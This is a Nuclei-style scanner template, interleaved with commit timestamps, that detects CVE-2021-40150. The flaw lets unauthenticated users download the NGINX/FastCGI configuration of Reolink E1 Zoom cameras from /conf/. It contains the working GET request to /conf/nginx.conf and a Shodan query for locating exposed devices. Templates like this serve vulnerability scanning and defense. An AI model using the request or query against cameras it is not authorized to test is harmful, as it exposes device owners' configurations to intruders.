2022-06-07 04:57:22 +00:00
id : CVE-2021-40150
info :
name : Reolink E1 Zoom Camera - Information Disclosure
author : For3stCo1d
2022-07-24 07:25:49 +00:00
severity : high
2022-06-07 10:08:34 +00:00
description : |
The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path.
An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations.
2022-06-07 04:57:22 +00:00
reference :
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt
2022-06-07 10:08:34 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150
2022-06-13 14:06:25 +00:00
classification :
2022-07-24 07:25:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-06-13 14:06:25 +00:00
cve-id : CVE-2021-40150
2022-07-24 07:25:49 +00:00
cwe-id : CWE-552
2022-06-07 04:57:22 +00:00
metadata :
shodan-query : http.title:"Reolink"
2022-07-24 07:25:49 +00:00
verified : "true"
2022-06-07 10:08:34 +00:00
tags : cve,cve2021,reolink,camera,exposure,iot
2022-06-07 04:57:22 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/conf/nginx.conf"
matchers-condition : and
matchers :
- type : word
words :
- "server"
- "listen"
- "fastcgi"
condition : and
- type : status
status :
- 200